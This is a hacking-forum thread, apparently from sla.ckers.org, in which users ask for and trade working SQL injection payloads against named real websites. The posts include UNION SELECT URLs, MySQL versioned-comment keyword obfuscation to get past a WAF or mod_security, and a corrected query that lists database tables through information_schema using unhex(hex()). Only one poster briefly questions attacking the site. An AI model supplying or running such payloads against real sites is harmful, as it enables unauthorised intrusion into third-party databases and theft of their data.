Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
strange error message
Posted by: kenjii
Date: December 07, 2013 09:22AM

hi all

i got an error on this website

http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}

i'am sure we can hack this but i don't find what is wrong

Options: ReplyQuote
Re: strange error message
Posted by: hack2012
Date: December 23, 2013 03:46AM

http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16%23

Options: ReplyQuote
Re: strange error message
Posted by: bakie
Date: January 08, 2014 12:01AM

thanks

Options: ReplyQuote
Re: strange error message
Posted by: kenjii
Date: May 14, 2014 12:36PM

thank you sorry for the long time for answer :)

Options: ReplyQuote
Re: strange error message
Posted by: Tej Nayak
Date: July 01, 2014 11:48AM

How to bypass this,can any one help me,

http://ccrc.in/success_stories.php?id=-1+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7,8,9,10,11,12--

Options: ReplyQuote
Re: strange error message
Posted by: Tej Nayak
Date: July 01, 2014 11:53AM

How to bypass this,can any one help me,
403-Forbidden
http://ccrc.in/success_stories.php?id=-1+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7,8,9,10,11,12--

Options: ReplyQuote
Re: strange error message
Posted by: Whitehat
Date: July 04, 2014 01:47AM

http://ccrc.in/success_stories.php?id=-1+/*!12345unIoN*/+/*!12345All*/+/*!12345seLEct*/+1,2,3,4,5,6,7,8,9,10,11,12--


=)

Options: ReplyQuote
Thanks!
Posted by: Tej Nayak
Date: July 06, 2014 11:32AM

Thanks a lot,dude ur really a Whitehat!

Options: ReplyQuote
Help
Posted by: Tej Nayak
Date: July 06, 2014 12:14PM

Can u help me what's the mistake in this

http://www.ccrc.in/success_stories.php?id=-1+/*!12345unIoN*/+/*!12345All*/+/*!12345seLEct*/+1,2,group_conacat(table_name)+4,5,6,7,8,9,10,11,12+information_schema.tables+where+table_schema=database()--

Options: ReplyQuote
Re: strange error message
Posted by: firestorm
Date: July 10, 2014 11:30AM

1. its concat not conacat
2. replace + with comma before 4
3. 12 from information instead of 12+information_schema
4. bypass more keywords
5. function group_concat does not exist so you can't use it.
6. Illegal mix of collations for operation 'UNION', use unhex to get pass that.
7. for what on earth you are injecting an Indian domain ?!



http://www.ccrc.in/success_stories.php?id=-1+/*!12345unIoN*/+/*!12345All*/+/*!12345seLEct*/+1,2,unhex(hex((table_name))),4,5,6,7,8,9,10,11,12+from+/*!12345information_schema*/.tables+where+table_schema=database()--

Options: ReplyQuote
Thanks!
Posted by: Tej Nayak
Date: July 18, 2014 08:45AM

Ooops so many mistakes am so raw.
Thanks a lot dude,ur the Man!
and injecting an Indian domain,just to learn!

By the way can u tell me when to use these hex n unhex terms?



Edited 2 time(s). Last edit at 07/18/2014 08:48AM by Tej Nayak.

Options: ReplyQuote
Re: strange error message
Posted by: Whitehat
Date: July 22, 2014 10:41AM

When you cant bypass mod_sec or waf.

Options: ReplyQuote


Sorry, only registered users may post in this forum.